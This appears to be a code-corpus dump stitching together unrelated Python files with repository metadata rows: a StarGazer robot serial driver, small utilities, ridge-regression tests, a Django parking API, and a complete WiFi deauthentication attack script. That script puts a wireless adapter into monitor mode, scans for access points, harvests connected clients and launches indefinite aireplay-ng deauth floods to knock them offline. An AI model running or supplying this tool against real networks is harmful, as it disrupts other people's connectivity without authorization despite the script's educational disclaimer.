# between checking the buffer for the STX/ETX characters
self._chunk_size = 80
self._callback_global = callback_global
self._callback_local = callback_local
self._callback_raw = callback_raw
self._callback_raw_reponse = callback_raw_reponse
self._stopped = Event()
self._thread = None
def __enter__(self):
self.connect()
return self
def __exit__(self, type, value, traceback):
if self.is_connected:
self.disconnect()
@property
def is_connected(self):
"""
Returns whether the driver is currently connected to a serial port.
"""
return self.connection is not None
def connect(self):
"""
Connect to the StarGazer over the specified RS-232 port.
"""
if self.is_connected:
self.disconnect()
self.connection = Serial(port=self.device, baudrate=115200, timeout=1.0)
if self.connection is None:
return False
return True
def disconnect(self):
"""
Disconnects from the StarGazer and closes the RS-232 port.
"""
if self.is_connected:
self.connection.close()
self.connection = None
if self.connection is None:
return True
return False
@property
def is_streaming(self):
"""
Returns whether the driver is currently streaming pose data.
"""
return self._thread is not None
def start_streaming(self):
"""
Begin streaming pose data from the StarGazer.
"""
assert self.is_connected and not self.is_streaming
success = self._send_command('CalcStart')
if success:
self._thread = Thread(target=self._read, args=()).start()
return success
def stop_streaming(self):
"""
Stop streaming pose data from the StarGazer.
"""
assert self.is_connected
if self.is_streaming:
self._stopped.set()
self._thread.join()
success = self._send_command('CalcStop')
return success
def reset_parameters(self):
"""
Stop streaming pose data from the StarGazer.
"""
assert self.is_connected and not self.is_streaming
success = self._send_command('Reset')
return success
def set_parameter(self, name, value):
"""
Set a StarGazer configuration parameter.
This function can only be called while the StarGazer is
connected, but not streaming.
Arguments
---------
name: string name of the parameter to set
value: string value of the parameter to set
Example
-------
set_parameter('MarkType', 'HLD1L')
"""
assert self.is_connected and not self.is_streaming
success = self._send_command(name, value)
return success
def get_parameter(self, name):
pass
def _send_command(self, *args):
"""
Send a command to the StarGazer.
Arguments
---------
command: string, or list. If string of single command, send just that.
if list, reformat to add delimiter character
Example
-------
_send_command('CalcStop')
_send_command('MarkType', 'HLD1L')
"""
success = True
delimited = DELIM.join(str(i) for i in args)
if 'SetEnd' in delimited:
delimited = 'SetEnd'
command_str = STX + CMD + delimited + ETX
rospy.loginfo('Sending command to StarGazer: %s', command_str)
# The StarGazer requires a 50 ms delay between each byte.
for ch in command_str:
self.connection.write(ch)
time.sleep(0.05)
response_expected = STX + RESPONSE + delimited + ETX
success = self._read_response(response_expected)
if success and ('SetEnd' in response_expected):
response_expected = STX + RESPONSE + 'ParameterUpdate' + ETX
time.sleep(1.0)
success = self._read_response(response_expected)
if(success):
rospy.loginfo('Parameters update successful')
return success
def _read_response(self, response_expected):
success = True
try:
response_actual = self.connection.read(len(response_expected))
except Exception as e:
rospy.logwarn(str(e))
sucess = False
return success
# Scan for more incoming characters until we get a read timeout.
# (This is useful if there is still some incoming data from previous
# commands in intermediate serial buffers.)
while response_actual[-len(response_expected):] != response_expected:
c = None
try:
c = self.connection.read()
except Exception as e:
rospy.logwarn(str(e))
return success
if c:
# Add new characters to the response string.
response_actual += c
else:
rospy.logwarn('Received invalid response {%s} expected "{%s}'% \
(response_actual, response_expected))
success = False
break
'''
# If we run out of characters and still don't match, report
# the invalid response as an exception.
raise Exception(
'Command "{:s}" received invalid response "{:s}"; '
'expected "{:s}".'
.format(command_str, response_actual, response_expected)
)
'''
print response_actual
if self._callback_raw_reponse:
self._callback_raw_reponse(response_actual)
return success
def _read(self):
"""
Read from the serial connection to the StarGazer, process buffer,
then execute callbacks.
"""
# Compute a regular expression that returns the last valid
# message in a StarGazer stream.
msg_pattern = ('.*' + STX + '(?P<type>.)(?P<payload>.+)' + ETX +
'(?P<remainder>.*)$')
msg_matcher = re.compile(msg_pattern)
# Compute a regular expression that converts a StarGazer message
# into a list of tuples containing parsed groups.
delimiter = '\\' + DELIM
number = '[\d\+\-\.]'
tag_pattern = (r'(?P<id>\d+)' + delimiter +
r'(?P<yaw>' + number + '+)' + delimiter +
r'(?P<x>' + number + '+)' + delimiter +
r'(?P<y>' + number + '+)' + delimiter +
r'(?P<z>' + number + '+)')
tag_matcher = re.compile(tag_pattern)
def process_buffer(message_buffer):
"""
Looks at current message_buffer string for STX and ETX chars.
Proper behavior is to process string found between STX/ETX for poses
and remove everything in the buffer up the last observed ETX.
Valid readings:
~^148|-175.91|+98.74|+7.10|182.39`
~^248|-176.67|+98.38|+8.39|181.91|370|-178.41|-37.05|+8.97|179.51`
No valid readings:
~*DeadZone`
"""
# Look for a matching message, return the buffer if none are found.
message = msg_matcher.match(message_buffer)
if not message:
return message_buffer
if message.group('type') == RESULT:
markers = tag_matcher.finditer(message.group('payload'))
local_poses = {}
raw_poses = []
for marker in markers:
# Parse pose information for this marker.
_id = marker.group('id')
yaw = -np.radians(float(marker.group('yaw')))
x = 0.01 * float(marker.group('x'))
y = 0.01 * float(marker.group('y'))
# Note: this axis is negated.
z = 0.0#-0.01 * float(marker.group('z'))
raw_pose = [_id,x,y,0,-yaw]
raw_poses.append(raw_pose)
# Convert the pose to a transform and store it by ID.
marker_to_stargazer = fourdof_to_matrix((x, y, z), yaw)
local_poses[_id] = np.linalg.inv(marker_to_stargazer)
if self._callback_raw:
self._callback_raw(raw_poses)
if self._callback_local:
self._callback_local(local_poses)
if self._callback_global:
global_poses, unknown_ids = local_to_global(self.marker_map,
local_poses)
self._callback_global(global_poses, unknown_ids)
elif message.group('type') == NOTIFY:
# TODO: Report deadzone messages in here!
pass
else:
pass
# Return the rest of the message buffer.
return message.group('remainder')
rospy.loginfo('Entering read loop.')
message_buffer = ''
while not self._stopped.is_set() and self.connection:
try:
message_buffer += self.connection.read(self._chunk_size)
message_buffer = process_buffer(message_buffer)
except Exception as e:
rospy.logwarn('Error processing current buffer: %s (content: "%s")',
str(e), message_buffer
)
message_buffer = ''
break # For debugging purposes.
rospy.loginfo('Exited read loop.')
def close(self):
self._stopped.set()
self._send_command('CalcStop')
self.connection.close()
def local_to_global(marker_map, local_poses):
"""
Transform local marker coordinates to map coordinates.
"""
global_poses = dict()
unknown_ids = set()
for _id, pose in local_poses.iteritems():
if _id in marker_map:
marker_to_map = marker_map[_id]
local_to_marker = np.linalg.inv(pose)
local_to_map = np.dot(marker_to_map, local_to_marker)
global_poses[_id] = local_to_map
else:
unknown_ids.add(_id)
return global_poses, unknown_ids
def fourdof_to_matrix(translation, yaw):
"""
Convert from a Cartesian translation and yaw to a homogeneous transform.
"""
T = transformations.rotation_matrix(yaw, [0,0,1])
T[0:3,3] = translation
return T
def _callback_dummy(data):
return
def _callback_print(data):
print(data)
| 33.274869
| 131
| 0.567855
| 11,119
| 0.874754
| 0
| 0
| 350
| 0.027535
| 0
| 0
| 5,010
| 0.394147
|
c06110be42afdd7912f3230ce0bb253e62f06b14
| 107
|
py
|
Python
|
example.py
|
karishmashuklaa/flatifyLists
|
af9c1cfc45c29756ff9e285dba65f3b4909dabab
|
[
"MIT"
] | null | null | null |
example.py
|
karishmashuklaa/flatifyLists
|
af9c1cfc45c29756ff9e285dba65f3b4909dabab
|
[
"MIT"
] | null | null | null |
example.py
|
karishmashuklaa/flatifyLists
|
af9c1cfc45c29756ff9e285dba65f3b4909dabab
|
[
"MIT"
] | null | null | null |
from flatifylists import flatifyList
example = [[[1,2], [3,[4,[5],6],7],8,9]]
print(flatifyList(example))
| 21.4
| 40
| 0.672897
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
c0619baa743809ca6b4e84726f67140652acbe34
| 834
|
py
|
Python
|
pympeg/_probe.py
|
AP-Atul/pympeg
|
26d18883d528ce73c09982f61440d170661165ae
|
[
"Unlicense"
] | 5
|
2021-01-18T03:19:32.000Z
|
2021-04-27T06:58:41.000Z
|
pympeg/_probe.py
|
AP-Atul/pympeg
|
26d18883d528ce73c09982f61440d170661165ae
|
[
"Unlicense"
] | null | null | null |
pympeg/_probe.py
|
AP-Atul/pympeg
|
26d18883d528ce73c09982f61440d170661165ae
|
[
"Unlicense"
] | null | null | null |
import os
import json
import subprocess
from ._exceptions import ProbeException
__all__ = ['probe']
def probe(filename, cmd='ffprobe', timeout=None):
"""Runs the ffprobe on the given file and outputs in json format """
if not os.path.isfile(filename):
raise FileExistsError(f"Input file {filename} does not exists.")
args = [cmd, '-show_format', '-show_streams', '-of', 'json']
args += [filename]
p = subprocess.Popen(
args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
communicate_kwargs = dict()
if timeout is not None:
communicate_kwargs['timeout'] = timeout
out, err = p.communicate(**communicate_kwargs)
if p.returncode != 0:
raise ProbeException('ffprobe', out, err)
return json.loads(out.decode('utf-8'))
| 24.529412
| 72
| 0.640288
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 190
| 0.227818
|
c063c02a86fbd38bc9d19422a9222b6d2583e226
| 252
|
py
|
Python
|
example/func_doc.py
|
tinashime/Python27
|
b632918c7368a9bcfc5af8353e136247d954fb5e
|
[
"bzip2-1.0.6"
] | null | null | null |
example/func_doc.py
|
tinashime/Python27
|
b632918c7368a9bcfc5af8353e136247d954fb5e
|
[
"bzip2-1.0.6"
] | null | null | null |
example/func_doc.py
|
tinashime/Python27
|
b632918c7368a9bcfc5af8353e136247d954fb5e
|
[
"bzip2-1.0.6"
] | null | null | null |
def printMax(x,y):
'''prints the maximum of two numbers.
The two values must be integers.'''
x = int(x)
y = int(y)
if x > y:
print x,'is maximun'
else:
print y,'is maximum'
printMax(3,5)
print printMax.__doc__
| 18
| 41
| 0.575397
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 102
| 0.404762
|
c064dd6092bc97df5e3082e40d12bf519228fd1e
| 16,602
|
py
|
Python
|
wifi_dos_own.py
|
Mr-Cracker-Pro/red-python-scripts
|
5bead83038aadf53fc868fb9a786cb37824b18eb
|
[
"MIT"
] | 1,353
|
2021-01-07T17:12:01.000Z
|
2022-03-31T21:30:38.000Z
|
wifi_dos_own.py
|
deepahir/red-python-scripts
|
5deef698bf505de30735120e7c3bab34707ad32c
|
[
"MIT"
] | 29
|
2021-01-30T21:12:16.000Z
|
2022-03-04T15:06:12.000Z
|
wifi_dos_own.py
|
deepahir/red-python-scripts
|
5deef698bf505de30735120e7c3bab34707ad32c
|
[
"MIT"
] | 1,238
|
2021-01-07T17:05:18.000Z
|
2022-03-31T23:25:04.000Z
|
#!/usr/bin/env python3
# Disclaimer:
# This script is for educational purposes only.
# Do not use against any network that you don't own or have authorization to test.
#!/usr/bin/python3
# We will be using the csv module to work with the data captured by airodump-ng.
import csv
# If we move csv files to a backup directory we will use the datetime module to create
# to create a timestamp in the file name.
from datetime import datetime
# We will use the os module to get the current working directory and to list filenames in a directory.
import os
# We will use the regular expressions module to find wifi interface name, and also MAC Addresses.
import re
# We will use methods from the shutil module to move files.
import shutil
# We can use the subprocess module to run operating system commands.
import subprocess
# We will create a thread for each deauth sent to a MAC so that enough time doesn't elapse to allow a device back on the network.
import threading
# We use the sleep method in the menu.
import time
# Helper functions
def in_sudo_mode():
"""If the user doesn't run the program with super user privileges, don't allow them to continue."""
if not 'SUDO_UID' in os.environ.keys():
print("Try running this program with sudo.")
exit()
def find_nic():
"""This function is used to find the network interface controllers on your computer."""
# We use the subprocess.run to run the "sudo iw dev" command we'd normally run to find the network interfaces.
result = subprocess.run(["iw", "dev"], capture_output=True).stdout.decode()
network_interface_controllers = wlan_code.findall(result)
return network_interface_controllers
def set_monitor_mode(controller_name):
"""This function needs the network interface controller name to put it into monitor mode.
Argument: Network Controller Name"""
# Put WiFi controller into monitor mode.
# This is one way to put it into monitoring mode. You can also use iwconfig, or airmon-ng.
subprocess.run(["ip", "link", "set", wifi_name, "down"])
# Killing conflicting processes makes sure that nothing interferes with putting controller into monitor mode.
subprocess.run(["airmon-ng", "check", "kill"])
# Put the WiFi nic in monitor mode.
subprocess.run(["iw", wifi_name, "set", "monitor", "none"])
# Bring the WiFi controller back online.
subprocess.run(["ip", "link", "set", wifi_name, "up"])
def set_band_to_monitor(choice):
"""If you have a 5Ghz network interface controller you can use this function to put monitor either 2.4Ghz or 5Ghz bands or both."""
if choice == "0":
# Bands b and g are 2.4Ghz WiFi Networks
subprocess.Popen(["airodump-ng", "--band", "bg", "-w", "file", "--write-interval", "1", "--output-format", "csv", wifi_name], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
elif choice == "1":
# Band a is for 5Ghz WiFi Networks
subprocess.Popen(["airodump-ng", "--band", "a", "-w", "file", "--write-interval", "1", "--output-format", "csv", wifi_name], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
else:
# Will use bands a, b and g (actually band n). Checks full spectrum.
subprocess.Popen(["airodump-ng", "--band", "abg", "-w", "file", "--write-interval", "1", "--output-format", "csv", wifi_name], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def backup_csv():
"""Move all .csv files in the directory to a new backup folder."""
for file_name in os.listdir():
# We should only have one csv file as we delete them from the folder every time we run the program.
if ".csv" in file_name:
print("There shouldn't be any .csv files in your directory. We found .csv files in your directory.")
# We get the current working directory.
directory = os.getcwd()
try:
# We make a new directory called /backup
os.mkdir(directory + "/backup/")
except:
print("Backup folder exists.")
# Create a timestamp
timestamp = datetime.now()
# We copy any .csv files in the folder to the backup folder.
shutil.move(file_name, directory + "/backup/" + str(timestamp) + "-" + file_name)
def check_for_essid(essid, lst):
"""Will check if there is an ESSID in the list and then send False to end the loop."""
check_status = True
# If no ESSIDs in list add the row
if len(lst) == 0:
return check_status
# This will only run if there are wireless access points in the list.
for item in lst:
# If True don't add to list. False will add it to list
if essid in item["ESSID"]:
check_status = False
return check_status
def wifi_networks_menu():
""" Loop that shows the wireless access points. We use a try except block and we will quit the loop by pressing ctrl-c."""
active_wireless_networks = list()
try:
while True:
# We want to clear the screen before we print the network interfaces.
subprocess.call("clear", shell=True)
for file_name in os.listdir():
# We should only have one csv file as we backup all previous csv files from the folder every time we run the program.
# The following list contains the field names for the csv entries.
fieldnames = ['BSSID', 'First_time_seen', 'Last_time_seen', 'channel', 'Speed', 'Privacy', 'Cipher', 'Authentication', 'Power', 'beacons', 'IV', 'LAN_IP', 'ID_length', 'ESSID', 'Key']
if ".csv" in file_name:
with open(file_name) as csv_h:
# We use the DictReader method and tell it to take the csv_h contents and then apply the dictionary with the fieldnames we specified above.
# This creates a list of dictionaries with the keys as specified in the fieldnames.
csv_h.seek(0)
csv_reader = csv.DictReader(csv_h, fieldnames=fieldnames)
for row in csv_reader:
if row["BSSID"] == "BSSID":
pass
elif row["BSSID"] == "Station MAC":
break
elif check_for_essid(row["ESSID"], active_wireless_networks):
active_wireless_networks.append(row)
print("Scanning. Press Ctrl+C when you want to select which wireless network you want to attack.\n")
print("No |\tBSSID |\tChannel|\tESSID |")
print("___|\t___________________|\t_______|\t______________________________|")
for index, item in enumerate(active_wireless_networks):
# We're using the print statement with an f-string.
# F-strings are a more intuitive way to include variables when printing strings,
# rather than ugly concatenations.
print(f"{index}\t{item['BSSID']}\t{item['channel'].strip()}\t\t{item['ESSID']}")
# We make the script sleep for 1 second before loading the updated list.
time.sleep(1)
except KeyboardInterrupt:
print("\nReady to make choice.")
# Ensure that the input choice is valid.
while True:
net_choice = input("Please select a choice from above: ")
if active_wireless_networks[int(net_choice)]:
return active_wireless_networks[int(net_choice)]
print("Please try again.")
def set_into_managed_mode(wifi_name):
"""SET YOUR NETWORK CONTROLLER INTERFACE INTO MANAGED MODE & RESTART NETWORK MANAGER
ARGUMENTS: wifi interface name
"""
# Put WiFi controller into monitor mode.
# This is one way to put it into managed mode. You can also use iwconfig, or airmon-ng.
subprocess.run(["ip", "link", "set", wifi_name, "down"])
# Put the WiFi nic in monitor mode.
subprocess.run(["iwconfig", wifi_name, "mode", "managed"])
subprocess.run(["ip", "link", "set", wifi_name, "up"])
subprocess.run(["service", "NetworkManager", "start"])
def get_clients(hackbssid, hackchannel, wifi_name):
subprocess.Popen(["airodump-ng", "--bssid", hackbssid, "--channel", hackchannel, "-w", "clients", "--write-interval", "1", "--output-format", "csv", wifi_name], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def deauth_attack(network_mac, target_mac, interface):
# We are using aireplay-ng to send a deauth packet. 0 means it will send it indefinitely. -a is used to specify the MAC address of the target router. -c is used to specify the mac we want to send the deauth packet.
# Then we also need to specify the interface
subprocess.Popen(["aireplay-ng", "--deauth", "0", "-a", network_mac, "-c", target_mac, interface])
# Regular Expressions to be used.
mac_address_regex = re.compile(r'(?:[0-9a-fA-F]:?){12}')
wlan_code = re.compile("Interface (wlan[0-9]+)")
# Program Header
# Basic user interface header
print(r"""______ _ _ ______ _ _
| _ \ (_) | | | ___ \ | | | |
| | | |__ ___ ___ __| | | |_/ / ___ _ __ ___ | |__ __ _| |
| | | / _` \ \ / / |/ _` | | ___ \/ _ \| '_ ` _ \| '_ \ / _` | |
| |/ / (_| |\ V /| | (_| | | |_/ / (_) | | | | | | |_) | (_| | |
|___/ \__,_| \_/ |_|\__,_| \____/ \___/|_| |_| |_|_.__/ \__,_|_|""")
print("\n****************************************************************")
print("\n* Copyright of David Bombal, 2021 *")
print("\n* https://www.davidbombal.com *")
print("\n* https://www.youtube.com/davidbombal *")
print("\n****************************************************************")
# In Sudo Mode?
in_sudo_mode()
# Move any csv files to current working directory/backup
backup_csv()
# Lists to be populated
macs_not_to_kick_off = list()
# Menu to request Mac Addresses to be kept on network.
while True:
print("Please enter the MAC Address(es) of the device(s) you don't want to kick off the network.")
macs = input("Please use a comma separated list if more than one, ie 00:11:22:33:44:55,11:22:33:44:55:66 :")
# Use the MAC Address Regex to find all the MAC Addresses entered in the above input.
macs_not_to_kick_off = mac_address_regex.findall(macs)
# We reassign all the MAC address to the same variable as a list and make them uppercase using a list comprehension.
macs_not_to_kick_off = [mac.upper() for mac in macs_not_to_kick_off]
# If you entered a valid MAC Address the program flow will continue and break out of the while loop.
if len(macs_not_to_kick_off) > 0:
break
print("You didn't enter valid Mac Addresses.")
# Menu to ask which bands to scan with airmon-ng
while True:
wifi_controller_bands = ["bg (2.4Ghz)", "a (5Ghz)", "abg (Will be slower)"]
print("Please select the type of scan you want to run.")
for index, controller in enumerate(wifi_controller_bands):
print(f"{index} - {controller}")
# Check if the choice exists. If it doesn't it asks the user to try again.
# We don't cast it to an integer at this stage as characters other than digits will cause the program to break.
band_choice = input("Please select the bands you want to scan from the list above: ")
try:
if wifi_controller_bands[int(band_choice)]:
# Since the choice exists and is an integer we can cast band choice as an integer.
band_choice = int(band_choice)
break
except:
print("Please make a valid selection.")
# Find all the network interface controllers.
network_controllers = find_nic()
if len(network_controllers) == 0:
# If no networks interface controllers connected to your computer the program will exit.
print("Please connect a network interface controller and try again!")
exit()
# Select the network interface controller you want to put into monitor mode.
while True:
for index, controller in enumerate(network_controllers):
print(f"{index} - {controller}")
controller_choice = input("Please select the controller you want to put into monitor mode: ")
try:
if network_controllers[int(controller_choice)]:
break
except:
print("Please make a valid selection!")
# Assign the network interface controller name to a variable for easy use.
wifi_name = network_controllers[int(controller_choice)]
# Set network interface controller to monitor mode.
set_monitor_mode(wifi_name)
# Monitor the selected wifi band(s).
set_band_to_monitor(band_choice)
# Print WiFi Menu
wifi_network_choice = wifi_networks_menu()
hackbssid = wifi_network_choice["BSSID"]
# We strip out all the extra white space to just get the channel.
hackchannel = wifi_network_choice["channel"].strip()
# backup_csv()
# Run against only the network we want to kick clients off.
get_clients(hackbssid, hackchannel, wifi_name)
# We define a set, because it can only hold unique values.
active_clients = set()
# We would like to know the threads we've already started so that we don't start multiple threads running the same deauth.
threads_started = []
# Make sure that airmon-ng is running on the correct channel.
subprocess.run(["airmon-ng", "start", wifi_name, hackchannel])
try:
while True:
count = 0
# We want to clear the screen before we print the network interfaces.
subprocess.call("clear", shell=True)
for file_name in os.listdir():
# We should only have one csv file as we backup all previous csv files from the folder every time we run the program.
# The following list contains the field names for the csv entries.
fieldnames = ["Station MAC", "First time seen", "Last time seen", "Power", "packets", "BSSID", "Probed ESSIDs"]
if ".csv" in file_name and file_name.startswith("clients"):
with open(file_name) as csv_h:
print("Running")
# We use the DictReader method and tell it to take the csv_h contents and then apply the dictionary with the fieldnames we specified above.
# This creates a list of dictionaries with the keys as specified in the fieldnames.
csv_h.seek(0)
csv_reader = csv.DictReader(csv_h, fieldnames=fieldnames)
for index, row in enumerate(csv_reader):
if index < 5:
pass
# We will not add the MAC Addresses we specified at the beginning of the program to the ones we will kick off.
elif row["Station MAC"] in macs_not_to_kick_off:
pass
else:
# Add all the active MAC Addresses.
active_clients.add(row["Station MAC"])
print("Station MAC |")
print("______________________|")
for item in active_clients:
# We're using the print statement with an f-string.
# F-strings are a more intuitive way to include variables when printing strings,
# rather than ugly concatenations.
print(f"{item}")
# Once a device is in the active clients set and not one of the threads running deauth attacks we start a new thread as a deauth attack.
if item not in threads_started:
# It's easier to work with the unique MAC Addresses in a list and add the MAC to the list of threads we started before we start running the deauth thread.
threads_started.append(item)
# We run the deauth_attack function in the thread with the argumenets hackbssid, item and wifi_name, we also specify it as a background daemon thread.
# A daemon thread keeps running until the main thread stops. You can stop the main thread with ctrl + c.
t = threading.Thread(target=deauth_attack, args=[hackbssid, item, wifi_name], daemon=True)
t.start()
except KeyboardInterrupt:
print("\nStopping Deauth")
# Set the network interface controller back into managed mode and restart network services.
set_into_managed_mode(wifi_name)
| 50.1571
| 219
| 0.634743
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 9,946
| 0.599084
|
c0668c5403b0ea8527a26c2985cb37df3eafd6d0
| 597
|
py
|
Python
|
lightwood/mixers/helpers/debugging.py
|
ritwik12/lightwood
|
7975688355fba8b0f8349dd55a1b6cb625c3efd0
|
[
"MIT"
] | null | null | null |
lightwood/mixers/helpers/debugging.py
|
ritwik12/lightwood
|
7975688355fba8b0f8349dd55a1b6cb625c3efd0
|
[
"MIT"
] | null | null | null |
lightwood/mixers/helpers/debugging.py
|
ritwik12/lightwood
|
7975688355fba8b0f8349dd55a1b6cb625c3efd0
|
[
"MIT"
] | null | null | null |
import subprocess
def get_gpu_memory_map():
'''
Keys are device ids as integers.
Values are memory usage as integers in MB.
'''
result = subprocess.check_output(
[
'nvidia-smi', '--query-gpu=memory.used',
'--format=csv,nounits,noheader'
], encoding='utf-8')
# Convert lines into a dictionary
gpu_memory = [int(x) for x in result.strip().split('\n')]
gpu_memory_map = dict(zip(range(len(gpu_memory)), gpu_memory))
return gpu_memory_map
def print_gpuutil_status():
import GPUtil
GPUtil.showUtilization()
| 27.136364
| 66
| 0.631491
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 215
| 0.360134
|
c066f48fe0ef8d58aa4b19024e03a53d9943e528
| 2,010
|
py
|
Python
|
optimization/prac1/tests/test_ridge.py
|
shaandesai1/AIMS
|
fee0be214b393af2184d565eb1e9aebb4eb6eeec
|
[
"MIT"
] | null | null | null |
optimization/prac1/tests/test_ridge.py
|
shaandesai1/AIMS
|
fee0be214b393af2184d565eb1e9aebb4eb6eeec
|
[
"MIT"
] | null | null | null |
optimization/prac1/tests/test_ridge.py
|
shaandesai1/AIMS
|
fee0be214b393af2184d565eb1e9aebb4eb6eeec
|
[
"MIT"
] | null | null | null |
import unittest
from sys import argv
import numpy as np
import torch
from objective.ridge import Ridge, Ridge_ClosedForm, Ridge_Gradient
from .utils import Container, assert_all_close, assert_all_close_dict
def _init_ridge(cls):
np.random.seed(1234)
torch.manual_seed(1234)
n_features = 3
n_samples = 5
mu = 0.02
cls.hparams = Container(n_features=n_features,
n_samples=n_samples,
mu=mu)
cls.w = torch.randn(n_features, 1, requires_grad=True)
cls.x = torch.randn(n_samples, n_features)
cls.y = torch.randn(n_samples)
class TestObj_Ridge_ClosedForm(unittest.TestCase):
def setUp(self):
_init_ridge(self)
self.obj = Ridge_ClosedForm(self.hparams)
def test_error(self):
error_test = self.obj.task_error(self.w, self.x, self.y)
error_ref = torch.tensor(1.3251)
assert_all_close(error_test, error_ref, "task_error returned value")
def test_oracle(self):
oracle_info_test = self.obj.oracle(self.w, self.x, self.y)
oracle_info_ref = {
'sol': torch.tensor([[-0.2297], [-0.7944], [-0.5806]]),
'obj': torch.tensor(1.3370)}
assert_all_close_dict(oracle_info_ref, oracle_info_test, "oracle_info")
class TestObj_Ridge_Gradient(unittest.TestCase):
def setUp(self):
_init_ridge(self)
self.obj = Ridge_Gradient(self.hparams)
def test_error(self):
error_test = self.obj.task_error(self.w, self.x, self.y)
error_ref = torch.tensor(1.3251)
assert_all_close(error_test, error_ref, "task_error returned value")
def test_oracle(self):
oracle_info_test = self.obj.oracle(self.w, self.x, self.y)
oracle_info_ref = {
'dw': torch.tensor([[0.7323], [1.4816], [-0.3771]]),
'obj': torch.tensor(1.3370)}
assert_all_close_dict(oracle_info_ref, oracle_info_test, "oracle_info")
if __name__ == '__main__':
unittest.main(argv=argv)
| 30.923077
| 79
| 0.656716
| 1,331
| 0.662189
| 0
| 0
| 0
| 0
| 0
| 0
| 109
| 0.054229
|
c0670360313a88da7a90013e4063946791935b2d
| 11,795
|
py
|
Python
|
app/parking/views.py
|
zollf/CITS3200
|
95fb7569dad325c057e441cd7265d3e85735c058
|
[
"CC0-1.0"
] | null | null | null |
app/parking/views.py
|
zollf/CITS3200
|
95fb7569dad325c057e441cd7265d3e85735c058
|
[
"CC0-1.0"
] | null | null | null |
app/parking/views.py
|
zollf/CITS3200
|
95fb7569dad325c057e441cd7265d3e85735c058
|
[
"CC0-1.0"
] | null | null | null |
from django.shortcuts import redirect
from django.http.response import JsonResponse
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_protect
from django.contrib.auth.decorators import login_required
from rest_framework.response import Response
from rest_framework.decorators import api_view
from rest_framework import status
from rest_framework.parsers import JSONParser
from .models import CarPark, CarBay
from app.authentication.models import User
from .serializers import *
from ..emails.send import log_and_send_mail
@login_required(login_url="/login")
@csrf_protect
@api_view(['GET', 'POST'])
def carparks_list(request):
if request.method == 'GET':
data = CarPark.objects.all()
serializer = CarParkSerializer(data, context={'request': request}, many=True)
return Response(serializer.data)
elif request.method == 'POST':
if 'pk' in request.data:
carpark = CarPark.objects.get(pk=request.data['pk'])
serializer = CarParkSerializer(carpark, data=request.data)
else:
serializer = CarParkSerializer(data=request.data)
if not serializer.is_valid():
if 'redirect' in request.data:
errors = [str(error[1][0]).replace("this field", error[0]) for error in serializer.errors.items()]
if 'pk' in request.data:
request.session["edit_carpark_errors"] = errors
return redirect(f"/admin/carparks/view/{request.data.get('pk', '')}")
else:
request.session["new_carpark_errors"] = errors
return redirect(f"/admin/carparks/add")
return JsonResponse(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
serializer.save()
if 'redirect' in request.data:
return redirect(request.data['redirect'])
return JsonResponse(serializer.data, status=status.HTTP_201_CREATED)
@login_required(login_url="/login")
@csrf_protect
@api_view(['GET', 'PUT', 'DELETE'])
def carpark_detail(request, pk):
try:
carpark = CarPark.objects.get(pk=pk)
except CarPark.DoesNotExist:
return HttpResponse(status=status.HTTP_404_NOT_FOUND)
if request.method == 'GET':
serializer = CarParkSerializer(carpark)
return JsonResponse(serializer.data)
elif request.method == 'PUT':
carpark_data = JSONParser().parse(request)
serializer = CarParkSerializer(carpark, data=carpark_data)
if serializer.is_valid():
serializer.save()
return JsonResponse(serializer.data)
return JsonResponse(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'DELETE':
carpark.delete()
return HttpResponse(status=status.HTTP_204_NO_CONTENT)
@login_required(login_url="/login")
@csrf_protect
@api_view(['GET', 'POST'])
def carbay_list(request):
if request.method == 'GET':
data = CarBay.objects.all()
serializer = CarBaySerializer(data, context={'request': request}, many=True)
return Response(serializer.data)
elif request.method == 'POST':
if 'pk' in request.data:
carpark = CarBay.objects.get(pk=request.data['pk'])
serializer = CarBaySerializer(carpark, data=request.data)
else:
serializer = CarBaySerializer(data=request.data)
if not serializer.is_valid():
if 'redirect' in request.data:
request.session["bay_errors"] = [str(error[1][0]).replace("this field", error[0])
for error in serializer.errors.items()]
return redirect(f"/admin/carparks/{request.data.get('carpark', '')}/bay/add")
return JsonResponse(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
serializer.save()
if 'redirect' in request.data:
return redirect(request.data['redirect'])
return JsonResponse(serializer.data, status=status.HTTP_201_CREATED)
@login_required(login_url="/login")
@csrf_protect
@api_view(['GET', 'PUT', 'DELETE'])
def carbay_detail(request, pk):
try:
carbay: CarBay = CarBay.objects.get(pk=pk)
except CarBay.DoesNotExist:
return HttpResponse(status=status.HTTP_404_NOT_FOUND)
if request.method == 'GET':
serializer = CarBaySerializer(carbay)
return JsonResponse(serializer.data)
elif request.method == 'PUT':
carbay_data = JSONParser().parse(request)
serializer = CarBaySerializer(carbay, data=carbay_data)
if serializer.is_valid():
serializer.save()
return JsonResponse(serializer.data)
return JsonResponse(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'DELETE':
carbay.delete()
return HttpResponse(status=status.HTTP_204_NO_CONTENT)
@login_required(login_url="/login")
@csrf_protect
@api_view(['GET'])
def carbays_list(request, pk):
if request.method == 'GET':
data = CarBay.objects.all().filter(carpark=pk)
serializer = CarBaySerializer(data, context={'request': request}, many=True)
return Response(serializer.data)
@login_required(login_url="/login")
@csrf_protect
@api_view(['POST'])
def bays_booked(request):
if request.method == 'POST':
"""
{
"date": "2000-01-01",
"carpark": 1
}
"""
if 'date' not in request.data and 'carpark' not in request.data:
return JsonResponse({
'error': 'Please supply what carpark and date you want.'
}, status=status.HTTP_400_BAD_REQUEST)
bays = BaysBooked.objects.filter(booking__date=request.data['date'], bay__carpark=request.data['carpark'])
baysBookedSerializer = BaysBookedSerializer(bays, context={'request': request}, many=True)
baysCleaned = []
# Do not return any information on bookings
for bay in baysBookedSerializer.data:
baysCleaned.append({
'pk': bay['pk'],
'bay': bay['bay'],
